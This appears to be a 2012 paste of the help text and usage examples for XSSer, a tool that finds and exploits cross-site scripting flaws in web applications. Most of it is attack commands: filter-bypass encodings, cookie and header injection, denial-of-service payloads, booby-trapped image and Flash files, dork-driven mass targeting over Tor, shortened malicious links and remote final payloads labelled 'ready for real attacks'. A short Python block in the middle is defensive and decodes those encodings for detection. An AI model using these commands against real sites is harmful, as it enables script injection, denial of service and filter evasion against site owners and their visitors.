iyan_squid

XSSer-Automatic Tool Pentesting XSS Attacks

Jan 30th, 2012
Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

Usage

xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Options:

--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose verbose (default: no)
--gtk launch XSSer GTK Interface

*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with these extra special features:

--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded

*Select Target(s)*:
At least one of these options has to be specified to set the source from which target URL(s) are taken.
You need to choose one of them to run XSSer:

-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target URLs
--De=DORK_ENGINE Search engine to use for dorking (bing, altavista, yahoo, baidu, yandex, youdao, webcrawler, ask, etc. See the dork.py file to check for available engines)

*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) to use as the payload to inject code.

-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Number of URLs to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH Depth level of the crawler: 1-5
--Cl Crawl only local target(s) URLs (default TRUE)

*Configure Request(s)*:
These options can be used to specify how to connect to the target(s) payload(s).
You can select multiple:

--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers, newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--retries=RETRIES Retries when the connection times out (default 3)

*Select Vector(s)*:
These options can be used to specify the XSS vector source code to inject in each payload.
Use them only if you don't want to inject the common XSS vector that is used by default.
Choose only one option:

--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file

*Select Bypasser(s)*:
These options can be used to encode the selected vector(s) to try to bypass any anti-XSS filters in the target(s) code and some IPS rules, if the target uses them.
They can also be combined with other techniques to provide encoding:

--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem Try -manually- different Character Encoding mutations (reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')

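Every bypasser above produces a string that the browser decodes back to the same payload, which is why a filter or log search that inspects only the raw parameter value misses it. As an added example (not XSSer's own code), the Python below canonicalizes a value by undoing those encodings before matching, and normalizes the DWORD/octal/hex host forms behind --Dwo/--Doo; the suspect pattern and the inet_aton-style address rules are assumptions of this example, not taken from the tool.

```python
import re
import urllib.parse

# Added example (not XSSer code): undo the bypasser encodings so a log reviewer or WAF rule sees the payload a browser would run.
_NUMERIC_REF = re.compile(r"&#(x[0-9a-fA-F]+|[0-9]+);?")                 # --Dec, --Hex, --Hes (semicolon optional)
_FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)", re.I)   # --Str
_JS_UNICODE = re.compile(r"%u([0-9a-fA-F]{4})")                            # %uXXXX form accepted by unescape()
_SUSPECT = re.compile(r"<script|javascript:|\bon[a-z]+\s*=", re.I)        # coarse illustrative rule (assumed)

def _ref_char(m: re.Match) -> str:
    code = int(m.group(1)[1:], 16) if m.group(1)[0] in "xX" else int(m.group(1))
    return chr(code) if code < 0x110000 else m.group(0)        # leave invalid references untouched
def decode_numeric_refs(s: str) -> str:
    return _NUMERIC_REF.sub(_ref_char, s)

def decode_fromcharcode(s: str) -> str:
    codes = lambda m: [int(n) & 0xFFFF for n in re.sub(r"\s", "", m.group(1)).split(",") if n]  # JS ToUint16
    return _FROMCHARCODE.sub(lambda m: "".join(map(chr, codes(m))), s)

def js_unescape(s: str) -> str:                                            # --Une: %uXXXX then %XX
    return urllib.parse.unquote(_JS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), s))

def canonicalize(value: str, max_rounds: int = 6) -> str:
    # Run every decoder until the string stops changing, so chained mutations such as --Cem "Hex,Str,Hex" collapse.
    for _ in range(max_rounds):
        new = decode_fromcharcode(decode_numeric_refs(js_unescape(value)))
        if new == value:
            break
        value = new
    return value

def looks_like_xss(value: str) -> bool:
    # Match only after canonicalization; matching the raw string misses every encoded variant.
    return bool(_SUSPECT.search(canonicalize(value)))

def _ipv4_part(p: str) -> int:                                             # hex, octal or decimal component
    return int(p, 16) if p[:2].lower() == "0x" else int(p, 8) if len(p) > 1 and p[0] == "0" else int(p)
def normalize_ipv4(host: str) -> str:
    # Rewrite inet_aton-style DWORD, octal and hex hosts (--Dwo, --Doo) as dotted decimal; other hosts pass through.
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(re.fullmatch(r"0[xX][0-9a-fA-F]+|[0-9]+", p) for p in parts):
        return host
    try:
        nums = [_ipv4_part(p) for p in parts]                              # "08" is not valid octal -> ValueError
    except ValueError:
        return host
    value = nums[-1] | sum(n << (24 - 8 * j) for j, n in enumerate(nums[:-1]))  # last part fills the remaining bits
    if any(n > 255 for n in nums[:-1]) or nums[-1] >> (8 * (5 - len(nums))):
        return host
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))
```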
*Special Technique(s)*:
These options can be used to try to inject code using different types of XSS techniques. You can select multiple:

--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)

*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important if you want to exploit the vulnerabilities you discover in the wild.
Choose only one option:

--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotely-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)

*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine them with your final code (except with DCP code):

--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code

*Miscellaneous*:

--silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to an XML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS display -final code- shortened (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered

Examples

If you have interesting examples of usage about XSSer, please send an email to the mailing list.

-------------------
* Simple injection from URL:

$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, applying "Hexadecimal" character encoding to the payloads, with verbose output and saving results to file (XSSlist.dat):

$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, change the payload to hexadecimal; second, change the first encoding to String.fromCharCode; third, re-encode the second encoding to hexadecimal), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advanced injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:

$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with depth 3 and 4 pages to see (XSSer Spider!):

$ python xsser.py -c3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:

$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sent with GET, using automatic payloading, with IP Octal payload obfuscation and printing results as a "tinyurl" shortened link (ready to share!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
-------------------
* Simple injection from URL, using GET, injecting a vector in the Cookie parameter, trying to use a DOM shadow space (no server logging!) and, if any "hole" exists, applying your manual final payload "malicious" code (ready for real attacks!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET and trying to generate from the results a "malicious" shortened link (is.gd) with a valid DoS (Denial Of Service) browser client payload:

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing the delay between requests to 10 seconds, injecting parameters in the HTTP User-Agent, HTTP Referer and Cookie parameters, using proxy Tor, with IP Octal obfuscation, with statistics results, in verbose mode and creating shortened links (tinyurl) of any valid injecting payloads found. (real playing mode!):

$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "in the wild", and ready to be uploaded.

$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!"
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to an XML file.

$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca (federated XSS pentesting botnet)

$ python xsser.py -d "login.php" --De "duck" --publish

* Examples online:

- http://identi.ca/xsserbot01
- http://twitter.com/xsserbot01
-------------------
* Create a .swf movie with XSS code injected

$ python xsser.py --fla "name_of_file"
-------------------
* Send a pre-checking hash to see if the target will generate -false positive- results

$ python xsser.py -u "host.com" --hash
-------------------
* Multiple fuzzing injections from URL, including DCP injections and exploiting our "own" code, spoofed in a shortened link, on positive results found. XSS real-time exploiting.

$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.

$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launching it in a browser directly

$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch

ScreenShots:
http://www.subhashdasyam.com/2011/06/xsser-automatic-tool-pentesting-xss.html
http://xsser.sourceforge.net/#download